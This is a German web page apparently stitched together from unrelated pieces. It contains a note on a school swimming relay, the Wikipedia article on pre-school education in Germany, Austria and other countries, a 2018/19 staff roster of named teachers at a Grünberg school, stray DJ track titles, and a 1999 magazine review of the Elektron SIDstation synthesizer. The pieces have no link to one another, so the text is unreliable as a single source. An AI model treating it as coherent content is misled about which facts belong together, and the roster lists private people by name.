Die Klassenstaffel gewann die Klasse 3b. Im Gegenverkehr trug ein Schwimmer eine Mütze, und sein Gegenüber musste ein Schwimmbrett, auf dem ein Becher stand, transportieren. In der Mitte der Strecke wurden Schwimmbrett und Mütze getauscht.

Vorschule Wikipedia Rippin Wettbewerb 2

Vorschule
Zur Navigation springen
Zur Suche springen
	Der Titel dieses Artikels ist mehrdeutig. Weitere Bedeutungen sind unter Vorschule (Begriffsklärung) aufgeführt.

Vorschule ist die Erziehung vor dem Schuleintritt, z. B. im Kindergarten und in gesonderten Vorschuleinrichtungen, die schulische Leistungen vorbereiten und besonders die Benachteiligung von Kindern aufgrund ihrer sozialen Herkunft abbauen soll. Die Vorschulerziehung wird in den deutschsprachigen Staaten sehr unterschiedlich gehandhabt.
Inhaltsverzeichnis

    1 Deutschland
        1.1 Ursprüngliche Bezeichnung im Kaiserreich und Nennung im Grundgesetz
        1.2 Vorschule
        1.3 Kindergarten
        1.4 Vorschulähnliche Erziehung an Grundschulen
            1.4.1 Aktuelle Einrichtungen (Stand: 2014)
            1.4.2 Frühere Einrichtungen
    2 Österreich
    3 Vorschulen in anderen Ländern
        3.1 Finnland
        3.2 Frankreich
        3.3 Vereinigte Staaten
    4 Siehe auch
    5 Literatur
    6 Weblinks
    7 Einzelnachweise

Deutschland
Ursprüngliche Bezeichnung im Kaiserreich und Nennung im Grundgesetz

Im Deutschen Kaiserreich (bis 1918) bezeichnete das Wort „Vorschule“ eine Schulform, die von der ersten bis zur dritten Klasse reichte. Sie konnte anstelle der Grundschule besucht werden, war ein Jahr kürzer und bereitete auf das Gymnasium vor. Ihr Besuch kostete erhebliche Gebühren, sodass sie den wohlhabenderen Bevölkerungsschichten vorbehalten blieb. Dadurch hatten die Kinder aus diesen Schichten einen Vorteil in der weiteren höheren Bildung (Gymnasium, Universität). In der Weimarer Republik wurden die Vorschulen deshalb abgeschafft.

Noch heute findet sich im Art. 7 Abs. 6 des Grundgesetzes der Satz „Vorschulen bleiben aufgehoben“, der aus der Weimarer Reichsverfassung übernommen wurde. Der Satz bezieht sich auf die privaten Vorschulen, die auf den Besuch des Gymnasiums vorbereiten sollten. Sie wurden 1920 durch die kostenlose staatliche Grundschule ersetzt. Vorschulen sollen nach heutigem Sprachgebrauch auf die Grundschule vorbereiten.
Vorschule

Eine typische Vorschule – zwischen Kindergarten und Grundschule – gibt es heute (mit Ausnahme zum Beispiel in Hamburg) kaum noch. Schulkindergärten oder Vorschulklassen werden, wo sie noch bestehen, abgebaut und dem Kindergartenbereich zugeordnet. Eine solche (auf das letzte Jahr vor der Einschulung konzentrierte) Vorbereitung auf die Schule wurde als spät einsetzend und zu kurz greifend kritisiert. In der Bildungsdebatte der 1970er Jahre in der Bundesrepublik Deutschland stand die Frage der Zuordnung der fünfjährigen Kinder schon einmal auf der Tagesordnung und wurde bereits damals zugunsten des Kindergartens entschieden.

In der DDR war dies immer unumstritten. Der Vorschulunterricht wurde in der Regel ein Jahr vor der Einschulung in demselben Gebäude durchgeführt, in dem sich die künftige Schule befand. Der Unterricht sollte den Kindern helfen, sich auf den auf sie zukommenden Schulunterricht hin zu orientieren und an dessen Rhythmus anzupassen. Zum Unterricht gehörten Sprachübungen, Handmotorik, mathematische Vorstellungen und Kreativität.[1]

Die im Zuge der PISA-Studien kritisierten Defizite der frühen Bildung richten sich nicht auf das Fehlen einer Vorschule, sondern auf die zu wenig systematische und ungenügend neueren wissenschaftlichen Erkenntnissen folgende frühe Bildung in den verschiedenen Formen der Kindertagesbetreuung.
Kindergarten
→ Hauptartikel: Kindergarten

In Kindergärten, die die Kinder ab dem dritten Lebensjahr besuchen, gibt es im Gegensatz zu Schulen keinen allgemeinverbindlichen Lehrplan. Art. 7 Grundgesetz billigt zwar der Schule einen (gegenüber dem Elternwillen) eigenständigen Bildungsauftrag zu, nicht aber den Einrichtungen der Kindertagesbetreuung. Die inhaltliche Gestaltungshoheit, auch die Festsetzung von Bildungszielen, liegt beim Träger der Einrichtung. Seit 2004 gibt es (auch infolge der PISA-Studien) eine verstärkte Diskussion über die frühe Bildung. Inzwischen haben fast alle Bundesländer Bildungspläne, die zumeist über Vereinbarungen mit den Trägern eine gewisse Verbindlichkeit erlangen sollen.
Vorschulähnliche Erziehung an Grundschulen
Aktuelle Einrichtungen (Stand: 2014)

In den in einigen Bundesländern bestehenden Schulkindergärten bzw. in den baden-württembergischen Grundschulförderklassen werden Kinder aufgenommen, die bei Erreichen des Alters für die allgemeine Schulpflicht noch nicht die erforderliche Schulreife haben. In den Förderklassen erwerben die Kinder neben den sozialen Kompetenzen auch fehlende sprachliche, graphomotorische und kognitive Fähigkeiten. Ziel dieser Einrichtungen ist es, eine Einschulung in einer Grundschule zum Beginn des nächsten Schuljahres zu ermöglichen. Der Ausgleich von defizitären Deutschkenntnissen gehört auch zum Aufgabenbereich einer Grundschulförderklasse.[2]

1970 wurden in Hamburg die ersten Vorschulklassen eingerichtet.[3] Die existierenden Vorschulklassen sind Einrichtungen der Grundschulen. Im Schuljahr 2013/14 wurden an 237 von 246 Grundschulen in Hamburg Vorschulklassen eingerichtet.[4] In die Vorschule aufgenommen werden schulpflichtige Kinder, die vom Besuch der Grundschule zurückgestellt worden sind und Kinder, bei denen im Rahmen der im Hamburgischen Schulgesetz vorgeschriebenen Sprachstandserhebung Defizite festgestellt worden sind.[5] Bei zurückgestellten Kindern besteht freie Wahl, ob sie eine Vorschulklasse an einer Grundschule besuchen wollen oder das Kind weiter in einer Kindertagesstätte betreut wird. Für Kinder, bei denen im Rahmen des Vorstellungsverfahrens ein ausgeprägter Sprachförderbedarf ermittelt wurde, ist ein Besuch der Vorschulklassen vor der Einschulung verpflichtend.[6]

In Bayern erhalten Kinder, deren Eltern beide nicht deutschsprachiger Herkunft sind und denen durch Sprachstandserhebung unzureichende Deutschkenntnisse bescheinigt werden, eine 240 Stunden dauernde spezielle Deutschförderung, den sogenannten Vorkurs. Die Vorkurse finden über einen Zeitraum von insgesamt eineinhalb Jahren statt.[7] Verpflichtend sind sie für schulpflichtige Kinder ausländischer Herkunft ohne ausreichende Deutschkenntnisse, die von der Einschulung zurückgestellt werden.[8] Die Vorkurse werden in enger Kooperation von pädagogischen Fachkräften der Kindergärten und Grundschullehrern durchgeführt.
Frühere Einrichtungen

Im Schulversuch (in Hessen und in Nordrhein-Westfalen) wurde in den 1970er Jahren die Grundschulzeit an manchen Schulen um ein Jahr vorgezogen und verlängert. Die Kinder wurden auf Wunsch der Eltern bereits ein Jahr vor Erreichen der Schulpflicht in die Schule aufgenommen. Im Rahmen des Schulversuchs sollten die Kinder spielerisch in den Schulalltag und an das Lernen herangeführt werden. Wegen der vorzeitigen Einschulung wurde der Schulversuch umgangssprachlich auch Vorschule genannt.

In Berlin wurde im Rahmen einer Schulreform die Vorschule zum letzten Mal im Schuljahr 2004/2005 durchgeführt. Gleichzeitig wurde das Einschulungsalter der Kinder um ein halbes Jahr vorverlegt. Dies hat zur Folge, dass 2005 anderthalb Jahrgänge eingeschult wurden. Die auf die Schule vorbereitende Erziehung soll zukünftig in den Kindergärten umgesetzt werden. Danach sollen die Kinder in eine „flexible Eingangsphase“, die zwischen einem und drei Jahren dauern kann, kommen. Nach der Eingangsphase kommen die Kinder dann in die 3. Klasse. Mit diesem Konzept soll erreicht werden, dass die Kinder in der 3. Klasse in etwa den gleichen Leistungsstand haben.
Österreich

In Österreich werden nicht schulreife, aber schulpflichtige Kinder in die Vorschule aufgenommen. Das bedeutet, dass diese Kinder in einer eigenen Vorschulklasse unterrichtet werden, sofern es diese an der Schule gibt, oder sie werden innerhalb der ersten Klasse Volksschule als Vorschulkinder geführt und nach dem Lehrplan der Vorschule unterrichtet. Ebenso kann es während des ersten Schuljahres zu einer Rückstellung in die Vorschule kommen, aber auch ein Aufstieg in die Volksschule ist innerhalb des Jahres möglich (flexible Schuleingangsphase). Die Kinder werden bereits im Kindergarten speziell gefördert, damit der Besuch einer Vorschule möglichst entfallen kann.

Die Vorschulzeit gilt als Teil der Schulzeit und wird der neunjährigen Schulpflicht angerechnet, womit der Besuch einer Polytechnischen Schule entfallen kann.
Vorschulen in anderen Ländern
Finnland

Finnland hat, wie die PISA-Studie zeigt, eines der erfolgreichsten Bildungssysteme weltweit. Im Vergleich scheint das finnische Bildungssystem dem deutschen deutlich überlegen zu sein.

Bereits in den frühen Jahren wird in Finnland die Bildung der Kinder als förderungs- und unterstützungswürdig angesehen, ohne dass schulische Bildungsformen auf den vorschulischen Bereich übertragen werden. Die Kinder werden relativ spät eingeschult (7 Jahre). Statt einer frühen Einschulung wird auf die Qualifikation der Fachkräfte im Vorschulbereich, auf die Personalausstattung sowie auf eine wissenschaftliche Begleitung und Unterstützung besonderer Wert gelegt.

Grundsätzlich ist in Finnland der Staat für die Betreuung der Kinder zuständig. Kinder haben ein Recht auf Betreuung und Erziehung (unabhängig von der Form). Die Kindertagesstätten gehören in Finnland zum Bildungssystem – im Gegensatz zu Deutschland, wo der Kindergarten von den Sozialministerien beaufsichtigt wird (nicht vom Kultusministerium eines Bundeslandes).

In Finnland besuchen 55 % der Kinder unter 7 Jahren eine Kindertagesstätte. Die Öffnungszeiten betragen ca. 10 Stunden; es gibt aber auch Tagesstätten, die 24 Stunden geöffnet haben. In der Regel wird eine ganz- oder halbtägige Aufnahme des Kindes angeboten. Die Gruppen werden altersgemischt in Ganztags- oder Halbtagsgruppen geführt. Meist besteht der Tag aus folgenden Schwerpunkten (N. Kuch, S. 5):

    Zusammenkommen am Morgen
    Feste Essenszeiten
    Ruhe am Mittag
    Spiele draußen
    musikalische und Sprachförderung
    Bildung soll angeboten werden, ist aber nicht verpflichtend.

Die Gruppengröße für Kinder unter 3 Jahren sind 12 Kinder, für Drei- bis Siebenjährige 20 Kinder. Der Betreuungsschlüssel beträgt für vier Kinder unter 3 Jahren oder für sieben Kinder über 3 Jahren eine Fachkraft (in der Regel eine an der Hochschule ausgebildete Erzieherin, s. u.).

Ein großer Anteil der Kosten für das Bildungssystem werden in Finnland in das Vorschulsystem investiert. Dahinter steckt die Idee, dass frühe Erziehung ein wesentlicher Bestandteil der Bildung ist. Wichtige Schwerpunkte der frühen Bildung sind:

    Ethik und Philosophie
    Gesundheit
    Körperliche und motorische Entwicklung
    Kunst und Kultur
    Mathematik
    Sprache und Interaktion
    Umwelt und Naturkunde.

(Siehe dazu Literatur: N. Kuch)

Die Ziele der Vorschulerziehung in Finnland sind (nach Natalija Kuch):

    Das positive Selbstbild der Kinder zu festigen und das Lernvermögen zu fördern, wobei spielerisches Lernen im Vordergrund stehen soll.
    Das Kind soll lernen, sich als Mitglied der Gruppe zu verstehen.
    Sie sollen wissen, was für ihr gesundheitliches Wohlergehen wichtig ist.
    Die sprachliche Identität soll entwickelt werden: Sich vielfältig ausdrücken, verschiedene Formen der Kunst kennenlernen – auch aus anderen Kulturen.
    Sie sollen ihre Umwelt erkunden und analysieren können; sie sollen sich an Schönheit und Vielfalt erfreuen können und die Folgen ihrer Handlungen für die Umwelt erkennen. (N. Kuch, S. 8)

Die Ausbildung von Erzieherinnen wurde 1995 in die Universitäten geholt – in Finnland allerdings nicht unumstritten. Zurzeit gibt es für diesen Studiengang eine Aufnahmeprüfung, weil die Nachfrage sehr groß ist. Erzieherinnen sind in Finnland wie Lehrer kommunale Angestellte. In der Regel ist dieses Personal gewerkschaftlich organisiert. Aber auch in Finnland verdienen Erzieherinnen (wie in Deutschland) weniger als die Kollegen im Primarschulbereich. Die Sozialerzieherin konzentriert sich stärker auf die Familie und „Sozialhilfe“. Dieser Beruf ist erst in letzter Zeit für die Vorschulerziehung von Bedeutung.

Die Kinderpflegerinnen-Ausbildung wurde 1994 in die Ausbildungsschiene Sozialpflege überführt. Sozialpfleger sollen möglichst breit in unterschiedlichen Bereichen und Gruppen eingesetzt werden können:

    Betreuung und Pflege
    Entwicklungsförderung
    Rehabilitation

Schließlich gibt es noch den Spielgruppenleiter, beispielsweise in Ausbildungsstätten der Lutherischen Kirche.
Frankreich
→ Hauptartikel: École maternelle

Die École Maternelle ist die französische Vorschule. In ihr werden Kinder von drei bis sechs Jahren unterrichtet, dabei sind Kinder einer Altersklasse innerhalb einer Gruppe.
Vereinigte Staaten
→ Hauptartikel: „Vereinigte Staaten“ im Artikel Kindergarten

In den Vereinigten Staaten besteht eine große Bandbreite von öffentlichen und privaten Vorschulprogrammen, die mehr als die Hälfte aller Kinder unter fünf Jahren und fast alle Fünfjährigen erreichen.[9] Das bedeutendste ist der Kindergarten, der in den USA kein Kinderbetreuungs-, sondern ein Bildungsprogramm der Grundschulen ist. Im Kindergarten werden die Fünfjährigen, die ein Jahr später in die erste Klasse gehen sollen, alphabetisiert und ganztägig nach einem altersgemäßen Grundschulcurriculum unterrichtet. Auch die privaten Day Care Centers und Nursery Schools, in denen besserverdienende Berufstätige ihre Kinder ganztags unterbringen, sowie die privaten Preschools, die preiswerter sind, aber nur Teilzeitprogramme anbieten, verstehen sich eher als Bildungseinrichtungen denn als Kinderbetreuungsservice. In solchen Einrichtungen wird nicht nur gespielt, gesungen und gebastelt, sondern auch grundschulpropädeutisch gelernt. Ein kleiner Teil der Vierjährigen erlernt hier bereits das Lesen, Schreiben und Rechnen. Auch Fremdsprachenunterricht findet gelegentlich statt. Migrantenkinder, die solche Ganztagsprogramme besuchen, erlernen Englisch per Immersion und sprechen es später meist auf muttersprachlichem Niveau. Viele amerikanische Vorschulprogramme – vor allem die ambitionierten Day Care Centers und Nursery Schools – lassen sich heute ähnlich akkreditieren, wie dies früher nur bei Hochschulen üblich war. Um soziale Ungerechtigkeiten auszugleichen – der Besuch guter Vorschulprogramme ist kostspielig und steht nur der Mittelschicht zur Verfügung – wurde 1965 das staatliche Programm Head Start begründet, in dem Kinder aus bildungsfernen Sozialschichten u. a. kostenlose Vorschulbildung erhalten können.
Siehe auch

    Familienzentrum
    Kinderkrippe
    Schulhort

Literatur

    Natalija Kuch: Vorschulerziehung in Finnland – Versuch eines Vergleichs mit der Vorschulerziehung in Deutschland. Studienarbeit. GRIN Verlag, 2007, ISBN 978-3-640-48458-4.
    Norbert Kühne: Vorschulische Erziehung – Wandel und pädagogische Profession der frühen Bildung, Raabe Verlag, Stuttgart 2017

Weblinks

    JMK/KMK-Beschluss von 2004 (PDF; 48 kB)
    Übersicht über die Bildungspläne der Länder
    senbjs.berlin.de
    Fachartikel zur Kindergartenpädagogik

Einzelnachweise
Gerhard Witzlack, Werner Klemke (Ill.): Bald bin ich ein Schulkind. Ein Buch zur Vorbereitung der Kinder auf die Schule. Verlag Volk und Wissen Berlin 1973, OCLC 179220810.
Vorschulklassen in Hamburger Grundschulen. In: hamburg.de. Abgerufen am 16. März 2016.
Vorschulklassen, Beispiel August-Hermann-Francke-Schulen, Hamburg
Abfrage bei HamburgService - Schulinfosystem (Memento des Originals vom 20. Oktober 2013 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Richtlinie für die Bildung und Erziehung in Vorschulklassen, Hamburg
Regelungen an Hamburger Vorschulen: Elternwahlrecht (Memento des Originals vom 24. Oktober 2013 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Vorkurs Deutsch 240, Bayern (Memento des Originals vom 20. Februar 2015 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Staatsinstitut für Frühpädagogik: Kindergärten mit integrierter Sprachförderung - Vorkurse Deutsch (Memento des Originals vom 24. April 2012 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.

    Why Should Schools Be Involved in Early Childhood? (Memento des Originals vom 21. März 2009 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.

Normdaten (Sachbegriff): GND: 4188709-8
Kategorien:

    SchultypVorschulpädagogikLebensstadium

Theo Koch Schule Gruenberg Kollegium 2018 und 2019

flash2 aka DJSpaceCourt - The Universe [Remake-2019] Aka Christian Fladung


Kollegium 2018/19
Aigner, Tanja
Almon, Marc
Altintas, Ceylan
Andersen, Oliver
Bäumner, Anne
Becker, Ann-Kristin
Biesgen, Matthias
Bink, Matthias
Bittendorf, Inga
Bosold, Felix
Bott, Sabrina
Bogusch, Dagmar
Braun, Peter
Breitstadt, Sarah
Burkart-Schäfer, Tanja
Chiroiu, Ingrid
Cimiotti, Verena
Daniel, Ulrich
Dörrbeck, Christine
Eifler, Elina
Eller, Rita
Engelke, Merit
Enns, Viktor
Evert, Meike
Feth, Clarissa
Gans, Corinna
Gehle, Nico
Geitl, Rainer
Gernoth, Rainer
Gimbel, Stefanie
Goldstein, Nicole
Goldstein, Rolf
Gonder, Renate
Göppert, Svenja
Größer, Peter
Halbich, Kerstin
Harthun, Christine
Hasenkampf, Albina
Hebert, Julia
Heide, Norbert
Heinke, Heike
Heun, Kathinka
Heuser, Aleksandra
Hofmann-Anders, Petra
Horst, Hans
Huscher, Martin
Hussain, Daniel
Irlmeyer, Bernd
Ißleib, Thorsten
Jacob-Schwalb, Corinna
Jochim, Marcel
Jochim, Synthia
Johnson, Nicole
Jorde, Andreas
Junker, Sebastian
Kammer, Sven
Kämmerling, Steffen
Kastner, Paula
Keller, Jörg
Klaus, Friedemann
Kleber, Laiska
Klein, Miriam
König, Manina
Kramer, Rüdiger
Kratz-Gunkel, Heike
Krimke, Christina
Krumbiegel, Thomas
Kühle, Nicole
Kupfer, Florian
Langwasser, Elisabeth
Leuschner, Christine
	Lisiecki, Annika
Maikler, Claudia
Mandler, Jutta
Mandler, Katja
Matis, Lina
Meiss, Peter
Metelmann, Moritz
Meyerinck, Rebecca von
Miebs, Alexandra
Miller, Georg
Mißbach, Markus
Molzberger, Peter
Müller, Alice
Müller, Christina
Neis, Max
Noack, Christian
Orth, Matthias
Paul, Roman
Pausch, Harald
Peter, Alexandra-Bettina
Philippi, Katharina
Plensat, Britta
Pregizer, Pia
Prick, Annalena
Raabe, Lisa
Reichel, Heike
Reidel, Nina
Reus, Manfred
Rink, Lena
Rischmann, Katja
Roth, Theresia
Rüster, Philipp
Schaake, Andreas
Schaake, Birte
Schildwächter, Kristin
Schmidt, Corinna
Schmidt, Ronald
Schmitt, Daniela
Schmitt, Michael
Schön, Benjamin
Schreyeck, Lothar
Schulze, Lothar
Schweizer, Rebecca
Sener, Dilan
Seror, Dominik
Sieber, Gerhard
Simon, Svenja
Sirokov, Lilija
Steuger, Klaus
Steuger, Monja-Lenke
Stöhr, Franz-Josef
Stöhr, Rebekka
Stumpf, Verena
Thelen, Oliver
Thelen, Tina
Trenk, Karina
Trikos, Veronika
Verworrn, Angela
Voglis, Andreas
Wagenknecht, Tobias
Wagner, Julia
Wallner, Donald
Warnecke, Anja
Weber, Kim
Wildner, Ralph
Wilhelmi, Hermann
Winkler, Christoph
Yamaner, Tatjana
Zeuch, Christian
Zimmermann, Carina
Zurek, Katharina

SIDStation 1 Format

flash2 aka DJSpaceCourt - Geburtstagslied von Christian - The Wave III Radio Edit

normal_wave-017.png
Klangbeispiel flash2 aka DJSpaceCourt - Katram 3.2 mit SIDStation, C64 und Emuliertem Chiptune.
MEMI - Hardware-Test: Elektron SIDstation

 MEMI Hardware-Test

 

Elektron SIDstation

6581 strikes back

 

erschienen in: GO64! - Das Magazin für wahre Computerfreaks, Ausgabe 3/99

Es begab sich einst um die Weihnachtszeit, da ereilte mich eine hilfesuchende Mail. Es war unser lieber Onkel Wanja, der da schrieb: "Du, ich bin bis über beide Ohren dicht. Und überhaupt, mit Musik kennst Du Dich eh besser aus - magst Du nicht einen Artikel über die SIDstation schreiben?" Wer könnte da schon nein sagen? Außerdem interessierte mich das Ding doch gewaltig.

von Rainer Buchty

Was'n das?

Wir alle kennen und lieben den Klang des SID als unverwechselbares Kennzeichen des C64. Gerade dieser unverwechselbare Klang war es auch, der den C64 gegen seine grafisch gleichwertigen Konkurrenten Atari 600/800XL auszeichnete. Später geriet dieser Klang jedoch in Vergessenheit und wurde durch das Sampling verdrängt, welches es erlaubte, erstmals realistische und naturgetreue Klänge auf dem Computer zu verwenden. Heute erlebt der Klang des SID ein Revival, zahlreiche Websites mit SID-Tunes und die Vielzahl von SID-Emulatoren auf unterschiedlichsten Computerplattformen zeugen davon.
Bei einigen geht die Liebe zum SID-Sound offenbar weiter, denn eine Gruppe von findigen Schweden kam auf die Idee, einen richtigen Synthesizer auf Basis des SID zu entwickeln - die SIDstation war geboren.

Spezifikationen - Vorsicht, Technik!

Wer nun glaubt, die SIDstation sei nichts anderes als ein C64 im neuen Gewand, der irrt. Es ist ein vollkommen eigenständiges Gerät, welches darüberhinaus in einem sehr schmucken Gehäuse daherkommt.

Front View of SIDstation

Doch was steckt an Innereien drin? Prinzipiell besteht die SIDstation aus einem Microcontroller vom Typ 68HC11, dem SID und der Betriebssoftware, die der SIDstation in der vorliegenden Version folgende Fähigkeiten verleihen:

  • 3 Oszillatoren (SID)
  • 5 Wellenformen (SID: Dreieck, Sägezahn, Rechteck, Rauschen und die Mischwellenform Dreieck/Rechteck)
  • 3 unabhängige ADSR-Hüllkurven (SID)
  • Multimode-Filter (SID: Tiefpass, Hochpass, Bandpass, Bandsperre) mit Resonanz
  • 4 Niederfrequenzoszillatoren, sog. LFOs (Software)
  • Arpeggiator (Software)
  • steuerbar über MIDI
  • ASID (Wiedergabe von SID-Tunes)

Soweit nichts unbekanntes, jeder SID-Programmierer kennt das ja von entsprechenden Composer-Tools oder Software-Synthesizern wie dem 1985 in der 64er veröffentlichten "Modulator".

Nun kennen wir alle den Sound des SID, der zwar durchaus eigenständig und kräftig ist - aber den direkten Vergleich mit professionellen Synthesizern besser scheut. (Dies hat übrigens auch Bob Yannes, dem Erfinder des SID und späteren Mitbegründer der Firma ENSONIQ, keine Ruhe gelassen. So hat er in Interviews stets betont, dass der SID durchaus besser zu machen gewesen wäre, jedoch der zeitliche Druck schlichtweg zu hoch war.) Gewagte Sache also, die SIDstation nicht nur mit "echten" Synthesizern wie Roland Juno 106 oder JP8000 zu vergleichen, sondern sie auch noch qualitativ über diese zu stellen, wie dies von den Entwicklern und Vertreibern der SIDstation auf ihrer Webpage (http://www.sidstation.com) getan wird.

How to make it better

Um den vergleichsweise schlechten Originalsound zu verbessern, wurden folgende Maßnahmen getroffen:

  • ausschließliche Verwendung von 6581-R4, der "besten" Fertigungsserie des SID
  • Optimierung der externen Filterkondensatoren zur Erzielung maximaler Resonanzfähigkeit des Filters
  • Trennung der digitalen und analogen Versorgungsspannung

Zugegeben, die Revision 4 des SID war die beste, auch ich habe meine C64 seinerzeit auf diese Fertigungsserie umgerüstet. Und durch die Verwendung zweier Stromkreise begegnet man dem Problem, welches beim C64 stets für ein 15kHz-Pfeifen im Audioausgang gesorgt hat, nämlich der Einstreuung von Digitalsignalen in den Endverstärker. Eine Optimierung der Filterkondensatoren ändert indes recht wenig am eigentlichen Klang des SID, so dass man davon ausgehen muss, dass die SIDstation lediglich "sauberer" klingt - am Klangverhalten an sich dürfte sich nichts geändert haben, was die Klangbeispiele auf www.sidstation.com auch belegen.

Wer braucht die SIDstation?

Die Frage ist berechtigt, soll die SIDstation (sobald in Stückzahlen lieferbar) doch für umgerechnet DM500.-- über die Ladentheke gehen. Elektron ESI AB, der Hersteller und Vertreiber der SIDstation, formuliert dies so:

"This is for people looking for a new sound. If you just want some acid squelches or soft Juno pads, go and get a Rebirth 338 or JP-8000. The realtime control of the SID chip gives the SIDstation its unique sound."
Sinngemäß übersetzt heißt dies, dass man sich offenbar sehr genau darüber bewusst ist, dass die SIDstation klanglich nicht mit vollwertigen Synthesizern mitzieht, die Eigenständigkeit der SIDstation ergibt sich jedoch aus der Art der Programmierung des SID.
Wer sich die SIDstation-FAQ durchliest, wird übrigens generell einen sehr harschen Ton gegenüber kritischen Fragen feststellen - gepaart mit einigen terminologischen Ungereimtheiten, die für mich Grund genug waren, mal nachzufragen.

Frage- und Antwort

Es wird mehrfach auf den einmaligen, unverwechselbaren Klang der SIDstation hingewiesen, der durch eine eigene Synthese erzeugt werden soll. Nun wissen wir alle, dass an der Synthese des SID nichts zu ändern ist. Er hat 3 digitale (auf Basis von sog. Phasenakkumulatoren erzeugte) Oszillatoren, welche nach erfolgter D/A-Wandlung über analoge Verstärker in ein analoges Multimodefilter und einen analogen Gesamtverstärker geschickt werden. Subtraktive Synthese in Reinkultur also - wie nun hier was ändern? Des Rätsels Lösung ist einfach und heißt Marketing: Man betrachtet die Miteinbeziehung des Arpeggiators in die Klangformung einfach als Syntheseform... Weiterhin soll die totale Echtzeitkontrolle aller Parameter Grund für diesen einmaligen Klang sein - nun frage ich mich allerdings, was daran so einzigartig ist, denn diese Fähigkeiten bietet jeder Uralt-Synthesizer bzw. via MIDI heutzutage ohnehin jedes Gerät.

Wer nun auf die Idee kommt, sowas könnte man doch leicht selbst auf dem heimischen 64er basteln, dem wird sogleich abgeraten. Der C64 sei dafür viel zu langsam. Das verwundert mich dann schon sehr, denn die bereits erwähnte "Modulator"-Software funktionierte auf dem C64 in Echtzeit - und war dabei synthesetechnisch wesentlich komplexer als die SIDstation, ja es gab sogar einen Patch, mit dem spezielle Keyboards direkt an den C64/Modulator angeschlossen werden konnte. Der Einwand, der C64 sei zu langsam, kann somit sicherlich in das Reich der Sagen und Märchen verwiesen werden...

Viel Wert legen die SIDstation-Entwickler auf die einfache, intuitive Bedienungsoberfläche der SIDstation. Diese stellt sich bei näherer Betrachtung allerdings gar nicht als so spektakulär heraus - ein Endlosdrehrad (auf neudeutsch "Alpha-Dial" genannt), 4 Echtzeitmodulatoren (Potis) sowie ein Tastenfeld samt Cursorsteuerung. Erinnert mich spontan an den Bedienungs"komfort" älterer Synthesizer-Expander und reißt mich demzufolge nun wirklich nicht vom Sockel, einzig Composer, die nie etwas anderes als einen Tracker gesehen haben, mögen da in spontanes Entzücken ausbrechen.

Wer sich nun denkt, dass Echtzeitregler im Zeitalter von MIDI ohnehin obsolet sind, da der Sequencer die entsprechenden Parameter liefert, der hat Pech. Die MIDI-Implementation ist derzeit eher rudimentär und umfasst gerade mal das Notwendigste, nämlich Note an, Note aus, Pitch Bend, Modulation Wheel und Programmumschaltung. Da eine aufwendigere MIDI-Implementation derzeit nicht unbedingt Priorität genießt (klar, erst muss einmal die Synthesesoftware komplett stehen), darf man gespannt sein, ob und wann weitere Controller oder gar die totale Fernbedienung der SIDstation via MIDI SysEx ihren Weg in die Software finden.

Wie klingt's denn nun?

Leider stand mir kein Testmuster zur Verfügung und derzeit wird auch noch fleißig an der Software geschraubt, um zusätzliche Features einzubauen. So konnte ich mich bei der Beurteilung nur auf die auf der SIDstation-Webpage zur Verfügung gestellten Demosounds stützen, die - im Interesse maximaler Werbewirksamkeit - sicherlich Glanzstücke der SIDstation darstellen. Gerne hätte ich die SIDstation auch in meinem Heimstudio in einem etwas größeren MIDI-Setup getestet, um zu hören, wie sich die SIDstation im Zusammenspiel mit anderen Geräten macht. Da dies allerdings nicht möglich war, muss ich mich hier auf die Demo-Tunes von Tomas Danko und anderen stützen, die ebenfalls via www.sidstation.com beziehbar sind.

Nun muss ich an dieser Stelle zugeben, dass ich diesen Artikel zweimal geschrieben habe - und der erste wäre ein ziemlicher Verriss geworden. Die älteren Klangbeispiele waren nämlich alles andere als berauschend, geschweige denn spektakulär. Man hörte einen auf Hochglanz polierten SID - und das war's dann allerdings auch schon wieder. So erschien mir die Aussage von Daniel Hansson, dem geistigen Vater der SIDstation, eher wie Realsatire, denn er schrieb mir folgendes...

"The unique sound of the SIDstation lays in its lo-fi character."
...und Lo-Fi war da sogar noch untertrieben, denn die SIDstation klang einfach nur matschig und schlecht.

Zeit heilt alle Wunden, sagt ein altes Sprichwort. Und auch der SIDstation hat die zusätzliche Zeit und das in dieser entstandene Betriebssystem-Update gut getan. Die neuen Klangbeispiele sind ungleich lebendiger und aufregender als die alten. Und während die SIDstation früher im Zusammenspiel mit "richtigen" Synthesizern eher dumpf und fad klang, vermag sie sich nun doch recht gut zu behaupten - und dies im positiven Sinne.

Allerdings muss man sich über eines im klaren sein: Die SIDstation ist sicher kein Lead-Synthesizer, daran werden auch zukünftige Betriebssystem-Updates nichts ändern - SID bleibt SID. Wer allerdings mit brachialen Rauhfaser-Bässen, Effektsounds und dem unverwechselbaren Charme der Arpeggios (Broken-Chords) liebäugelt, der schließt die SIDstation sicher schnell ins Herz. Und wer schon immer einen SID-Player als Standalone-Gerät haben wollte, der kommt an der SIDstation ohnehin nicht vorbei...

Zukunftsmusik

Wie bereits angesprochen, befindet sich die SIDstation eigentlich noch im Alpha-Stadium. Die Hardware steht zwar schon, aber an der Software wird fleißig geschraubt. Interessanterweise ergaben sich aus dem eMail-Verkehr mit mir einige neue Aspekte, die ggf. in die Software mit eingearbeitet werden sollen, als da wären:

  • unterschiedliche Gate-On/Gate-Off Wellenformen (vgl. Soundmonitor)
  • MIDI-Synchronisation von Arpeggiator und LFOs
  • Implementation einer Fernsteuerung der SIDstation via MIDI-SysEx
  • Unterstützung (weitgehend) aller MIDI-Controller
  • Implementierung eines Step-Sequencers
  • Implementierung von 4Bit-Sampling

